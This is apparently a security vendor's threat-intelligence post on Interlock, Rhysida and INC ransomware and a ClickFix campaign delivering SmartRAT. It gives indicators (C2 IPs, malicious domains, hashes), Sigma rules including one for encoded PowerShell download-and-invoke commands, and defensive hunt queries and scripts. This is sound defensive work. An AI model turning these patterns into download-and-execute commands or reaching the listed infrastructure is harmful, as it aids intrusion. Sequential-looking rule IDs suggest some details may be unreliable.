Back to Intelligence

Interlock, Rhysida & INC Ransomware Ecosystems + AI-Driven ClickFix: OTX Pulse Analysis

SA
Security Arsenal Team
June 18, 2026
6 min read

Recent OTX pulse data highlights a convergence of sophisticated ransomware operations and emerging AI-driven delivery mechanisms. Primary activity centers on the Interlock (Hive0163) and Rhysida ecosystems, leveraging a complex supply chain of custom malware like NodeSnake, InterlockRAT, and JunkFiction to facilitate espionage and extortion. Concurrently, the INC ransomware group has rapidly ascended to a top-tier RaaS position, capitalizing on the void left by LockBit and BlackCat by utilizing cross-platform Rust-based encryptors. Separately, a novel AI-generated ClickFix campaign has been observed targeting the Brazilian financial sector, delivering SmartRAT via typosquatting domains and fake CAPTCHAs. These campaigns collectively demonstrate a shift toward AI-assisted infrastructure generation, multi-platform ransomware capabilities, and complex initial access vectors.

Threat Actor / Malware Profile

Interlock (Hive0163) & Rhysida

  • Malware Families: NodeSnake, InterlockRAT, JunkFiction, Supper, Interlock, Broomstick, Tomb crypter.
  • Distribution: Spear-phishing, trojanized installers, exploitation of vulnerabilities (e.g., CVE-2023-36036).
  • Payload Behavior: NodeSnake acts as a stealthy backdoor; InterlockRAT provides remote access; JunkFiction serves as a downloader. The payload chain often leads to the Interlock or Rhysida ransomware encryptors.
  • C2 Communication: Encrypted C2 channels (observed with NodeSnake), likely utilizing custom protocols over HTTP/HTTPS.
  • Persistence: Scheduled tasks, service installation, and registry modifications for backdoors (SystemBC, Sliver support).
  • Anti-Analysis: Use of the Tomb crypter to obfuscate payloads and evade static detection.

INC Ransomware

  • Malware Families: INC Ransomware (Lynx/Sinobi variants), Cobalt Strike.
  • Distribution: RaaS affiliate model, likely leveraging compromised credentials and vulnerabilities (e.g., CVE-2023-3519, CVE-2023-48788).
  • Payload Behavior: Rust-based encryptors for both Windows and Linux/ESXi systems. Features include double-extortion techniques (data theft + encryption).
  • C2 Communication: Uses TOR hidden services for victim negotiation and data leak sites (.onion domains).
  • Persistence: Via scheduled tasks and service persistence mechanisms typical of ransomware operators.
  • Anti-Analysis: Rust compilation increases analysis complexity; likely employs anti-debugging techniques.

SmartRAT (ClickFix Campaign)

  • Malware Families: SmartRAT, GhostLoader.
  • Distribution: AI-generated typosquatting domains (e.g., impersonating Brazilian banks). Users are tricked by fake CAPTCHA/BSOD screens into running malicious PowerShell commands (ClickFix).
  • Payload Behavior: PowerShell-based banking trojan (SmartRAT) with capabilities for encrypted C2, keylogging, and potentially QR code interception.
  • C2 Communication: Encrypted C2 to command and control servers.
  • Persistence: GhostLoader likely establishes persistence via registry run keys or scheduled tasks.
  • Anti-Analysis: Use of PowerShell obfuscation and AI-generated domains to bypass reputation filters.

IOC Analysis

The provided IOCs include a mix of network and file-based indicators crucial for detection:

  • Domains: Includes typosquatting domains (e.g., crefisa.online), C2 domains (e.g., windowsupdate-cdn.com), and TOR hidden services associated with INC ransomware. SOC teams should block these at the perimeter and DNS resolvers.
  • IP Addresses: C2 infrastructure IPs (e.g., 185.196.9.234, 162.141.111.227). These should be blocked on firewalls and monitored for outbound connections.
  • File Hashes: MD5, SHA1, and SHA256 hashes for malware samples (InterlockRAT, SmartRAT, INC ransomware). These can be used to scan endpoints via EDR and SIEM.
  • CVEs: Vulnerability identifiers (e.g., CVE-2023-36036, CVE-2025-5777) indicate specific exploits used for initial access. Vulnerability management is critical.

Operationalization:

  • EDR/SIEM: Import all file hashes into EDR threat feeds for immediate scanning. Correlate process executions with these hashes against DeviceProcessEvents.
  • Network Security: Block domains and IPs at the firewall, proxy, and DNS layer. Monitor DeviceNetworkEvents for connections to these indicators.
  • Threat Intelligence Platforms: Feed the IOCs into TI platforms to automatically enrich alerts and block future related artifacts.

Detection Engineering

YAML
---
title: Potential Interlock NodeSnake C2 Traffic
id: 3a1b2c3d-4e5f-6a7b-8c9d-0e1f2a3b4c5d
description: Detects potential network activity associated with NodeSnake C2 infrastructure based on specific user-agent or endpoint patterns often used by the malware.
status: experimental
date: 2026/06/18
author: Security Arsenal
logsource:
    category: network_connection
detection:
    selection:
        DestinationIp|contains:
            - '185.196.9.'
        Initiated: true
    condition: selection
falsepositives:
    - Legitimate traffic to IP range (unlikely)
level: high
tags:
    - attack.command_and_control
    - attack.t1071
---
title: Suspicious PowerShell Execution via ClickFix Pattern
id: 4b2c3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
description: Detects PowerShell commands often used in ClickFix campaigns involving Base64 encoded strings and suspicious flags typical of SmartRAT delivery.
status: experimental
date: 2026/06/18
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - ' -e '
            - ' -Enc '
            - 'FromBase64String'
        CommandLine|contains|all:
            - 'http://'
            - 'invoke'
    condition: selection
falsepositives:
    - Administrative scripts
level: high
tags:
    - attack.execution
    - attack.t1059.001
---
title: INC Ransomware Rust Process Execution
id: 5c3d4e5f-6a7b-8c9d-0e1f-2a3b4c5d6e7f
description: Detects the execution of suspicious processes that may be Rust-based ransomware like INC, characterized by high entropy and lack of valid digital signatures in uncommon paths.
status: experimental
date: 2026/06/18
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '.exe'
        Signed: 'false'
        CommandLine|contains:
            - 'encrypt'
            - '--path'
    condition: selection
falsepositives:
    - Legitimate unsigned utilities (rare)
level: critical
tags:
    - attack.impact
    - attack.t1486


kql
// Hunt for network connections to known malicious IPs and domains from OTX Pulses
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteIP in ("185.196.9.234", "162.141.111.227") or RemoteUrl has_any ("leadslaw.com", "incblog.su", "crefisa.online", "windowsupdate-cdn.com")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteIP, RemoteUrl, RemotePort
| extend HuntTag = "OTX_Pulse_IOC_Connection"


powershell
# IOC Hunt Script for Interlock/Rhysida/INC Malware Artifacts
# Run as Administrator

Write-Host "Starting Hunt for OTX Pulse IOCs..." -ForegroundColor Cyan

# Check for specific file hashes
$targetHashes = @(
    "f0b3e112ce4807a28e2b5d66a840ed7f",
    "edbf152ed9ac79e5d9e0111d1071af48",
    "297eb45f028d44d750297d2f932b9c91",
    "3c72e1f37f115b00c3ad6ed31bacfe8a"
)

# Scan C:\ drive for these hashes (Note: This is a basic scan, adjust scope as needed)
Write-Host "Scanning for known malicious file hashes..." -ForegroundColor Yellow
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | 
    ForEach-Object {
        $hash = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
        if ($targetHashes -contains $hash) {
            Write-Host "[!] Match Found: $($_.FullName)" -ForegroundColor Red
        }
    }

# Check for suspicious network connections (Active connections)
Write-Host "Checking for active connections to known C2 IPs..." -ForegroundColor Yellow
$targetIPs = @("185.196.9.234", "162.141.111.227")
$connections = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue

foreach ($ip in $targetIPs) {
    if ($connections.RemoteAddress -eq $ip) {
        Write-Host "[!] Suspicious Connection to $ip detected!" -ForegroundColor Red
        $connections | Where-Object { $_.RemoteAddress -eq $ip } | Format-Table -AutoSize
    }
}

Write-Host "Hunt Complete." -ForegroundColor Green

Response Priorities

  • Immediate:
    • Block all listed IP addresses and domains at the firewall, proxy, and DNS layer.
    • Initiate a hunt for file hashes across all endpoints using EDR.
    • Isolate any endpoints with confirmed matches or suspicious behavior.
  • 24h:
    • Conduct identity verification and password resets for accounts on affected endpoints, specifically targeting credentials that may have been stolen by malware like InterlockRAT or SmartRAT.
    • Review logs for lateral movement indicators associated with Cobalt Strike or SystemBC.
  • 1 week:
    • Patch systems against the referenced CVEs (CVE-2023-36036, CVE-2023-3519, CVE-2025-5777).
    • Implement email filtering rules to block typosquatting domains and suspicious attachments associated with these campaigns.
    • Conduct security awareness training focused on identifying fake CAPTCHAs and social engineering techniques (ClickFix).

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-aptransomwareinterlockrhysidasmartratclickfix

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action